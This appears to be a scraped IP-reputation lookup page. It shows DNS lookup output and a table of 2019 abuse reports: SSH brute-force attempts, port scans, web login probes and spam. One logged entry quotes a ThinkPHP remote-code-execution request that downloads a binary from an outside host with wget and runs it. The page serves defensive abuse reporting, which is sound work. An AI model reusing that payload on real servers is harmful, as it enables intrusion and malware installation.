城市(city): unknown
省份(region): unknown
国家(country): United States of America (the)
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 214.246.49.91
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34904
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;214.246.49.91. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025021700 1800 900 604800 86400
;; Query time: 61 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 17 13:57:29 CST 2025
;; MSG SIZE rcvd: 106Host 91.49.246.214.in-addr.arpa. not found: 3(NXDOMAIN)
server can't find 214.246.49.91.in-addr.arpa: SERVFAIL| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 178.34.144.55 | attackbotsspam | SSH Bruteforce attack |
2019-06-22 11:41:21 |
| 5.61.36.189 | attackbotsspam | URI: /libraries/joomla/session/session.php |
2019-06-22 11:47:07 |
| 213.251.182.110 | attack | Request: "GET /mm.php HTTP/1.1" Request: "GET /mm.php HTTP/1.1" |
2019-06-22 11:16:45 |
| 58.244.89.146 | attackspam | 58.244.89.146 - - \[21/Jun/2019:21:36:46 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://185.172.110.245/x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0" ... |
2019-06-22 11:08:52 |
| 176.216.117.200 | attack | Request: "GET / HTTP/1.1" |
2019-06-22 11:35:53 |
| 186.163.17.202 | attackbots | Autoban 186.163.17.202 AUTH/CONNECT |
2019-06-22 11:38:41 |
| 121.129.112.106 | attackspam | Automatic report - Web App Attack |
2019-06-22 11:04:10 |
| 94.23.212.137 | attack | Jun 22 00:43:51 XXXXXX sshd[61011]: Invalid user gen from 94.23.212.137 port 56544 |
2019-06-22 11:15:08 |
| 87.237.42.98 | attack | [portscan] Port scan |
2019-06-22 11:39:48 |
| 178.18.74.210 | attackspambots | Request: "GET / HTTP/1.1" |
2019-06-22 11:42:13 |
| 185.234.217.9 | attack | [munged]::80 185.234.217.9 - - [22/Jun/2019:05:14:59 +0200] "POST /[munged]: HTTP/1.1" 200 4444 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" [munged]::80 185.234.217.9 - - [22/Jun/2019:05:14:59 +0200] "POST /[munged]: HTTP/1.1" 200 4444 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" [munged]::80 185.234.217.9 - - [22/Jun/2019:05:14:59 +0200] "POST /[munged]: HTTP/1.1" 200 4444 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" [munged]::80 185.234.217.9 - - [22/Jun/2019:05:15:00 +0200] "POST /[munged]: HTTP/1.1" 200 4444 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" [munged]::80 185.234.217.9 - - [22/Jun/2019:05:15:00 +0200] "POST /[munged]: HTTP/1.1" 200 4444 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" [munged]::80 185.234.217.9 - - [22/Jun/2019:05:15:00 +0200] "POST /[munged]: HTTP/1.1" 200 4444 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gec |
2019-06-22 11:44:58 |
| 167.250.97.232 | attack | Jun 21 16:18:10 mailman postfix/smtpd[23936]: warning: unknown[167.250.97.232]: SASL PLAIN authentication failed: authentication failure |
2019-06-22 11:43:59 |
| 180.129.125.141 | attackspam | [ER hit] Tried to deliver spam. Already well known. |
2019-06-22 11:10:50 |
| 172.81.248.249 | attackbotsspam | Jun 21 21:20:44 Ubuntu-1404-trusty-64-minimal sshd\[27673\]: Invalid user qie from 172.81.248.249 Jun 21 21:20:44 Ubuntu-1404-trusty-64-minimal sshd\[27673\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.81.248.249 Jun 21 21:20:46 Ubuntu-1404-trusty-64-minimal sshd\[27673\]: Failed password for invalid user qie from 172.81.248.249 port 57424 ssh2 Jun 21 21:35:37 Ubuntu-1404-trusty-64-minimal sshd\[5411\]: Invalid user hadoop from 172.81.248.249 Jun 21 21:35:37 Ubuntu-1404-trusty-64-minimal sshd\[5411\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.81.248.249 |
2019-06-22 11:48:14 |
| 188.169.4.108 | attack | SS5,WP GET /wp-login.php |
2019-06-22 11:03:10 |